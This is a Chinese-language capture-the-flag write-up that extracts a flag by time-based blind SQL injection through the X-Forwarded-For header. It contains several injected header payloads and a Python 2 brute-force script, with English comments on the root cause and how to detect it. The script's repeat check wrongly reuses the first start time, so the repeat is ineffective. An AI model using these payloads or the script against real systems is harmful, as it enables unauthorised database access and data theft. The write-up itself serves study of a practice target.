原题查看:http://ctf5.shiyanbar.com/web/wonderkun/index.php
记录了ip
顺势想到可能是X-Forwarded-For的问题
又因为题目提示记录到db中去
就可以想到应该是注入
X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when (length(database())=4) then sleep(2) else sleep(0) end))lzRG) and '1'='1
可以看到库名是4位
X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when (database() like 'web1') then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里可以得到数据库名web1
X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(*) from flag)>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里可以得到数据库的表名
X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag)>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里可以得到数据库的列名
X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag)>1) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里没有延时,可以判断只有一条数据
X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select length(flag) from flag )=32) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里可以得到flag的长度
X-FORWARDED-FOR: 127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag where flag like "%")>0) then sleep(2) else sleep(0) end))lzRG) and '1'='1
这里就开始写个脚本爆破
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Writeup script: time-based blind SQL injection through the X-Forwarded-For
# header of the CTF target named in `url` below.
#
# How it works (as the surrounding writeup explains): the target stores the
# client IP taken from X-Forwarded-For into a database without parameterising
# the query, so the header value ends up inside SQL. Each request below asks a
# yes/no question -- "does the flag start with <prefix><char>?" -- using LIKE,
# and answers it with sleep(5) (yes) vs sleep(0) (no). The HTTP response body
# is never inspected; the only oracle is wall-clock response time.
#
# Defender's takeaways:
#   * Root cause is string concatenation of a client-controlled header into a
#     SQL statement. Prepared statements / parameterised queries remove the
#     injection regardless of header content.
#   * X-Forwarded-For is attacker-controlled unless it is overwritten by your
#     own reverse proxy; it must be treated as untrusted input like any other.
#   * Detection: a burst of requests from one source whose X-Forwarded-For
#     contains SQL keywords (select, case when, sleep) together with elevated
#     server-side query latency is a strong signal of exactly this technique.
#
# NOTE: this is Python 2 (print statements); it will not run unchanged on
# Python 3.
import requests
import time
# Candidate characters tried at each position. Only lowercase is tried because,
# as the author notes, MySQL LIKE is case-insensitive.
payloads='abcdefghijklmnopqrstuvwxyz0123456789@_.{}-' #mysql like is case-insensitive
flag = ""  # prefix of the flag recovered so far
print 'Start to retrive flag:'
# 32 positions: the writeup established length(flag)=32 with an earlier probe.
for i in range(32):
    for payload in payloads:
        starttime=time.time()
        url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
        headers = {
            "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",
            "Connection": "keep-alive",
            # The injected value: the current guess `flag + payload` is placed
            # in a LIKE pattern; a match triggers sleep(5), otherwise sleep(0).
            "X-FORWARDED-FOR": "127.0.0.1' and (SELECT * FROM (SELECT(case when ((select count(flag) from flag where flag like '"+flag+payload+"%')>0) then sleep(5) else sleep(0) end))lzRG) and '1'='1"
        }
        # `res` is assigned but never read: the oracle is purely timing-based.
        res = requests.get(url, headers=headers)
        # Threshold equals the sleep() value, so a slow network alone can look
        # like a "yes"; the request is repeated to reduce false positives.
        if time.time() - starttime > 5:
            starttime2=time.time()
            res = requests.get(url, headers=headers)
            if time.time() - starttime > 5:
                flag+=payload
                # The "database is" label is left over from an earlier probe;
                # `flag` holds the flag prefix recovered so far.
                print ' database is:',flag,
                break
        else:
            print '.',
print ' [Done] current database is %s' %flag
最后得到flag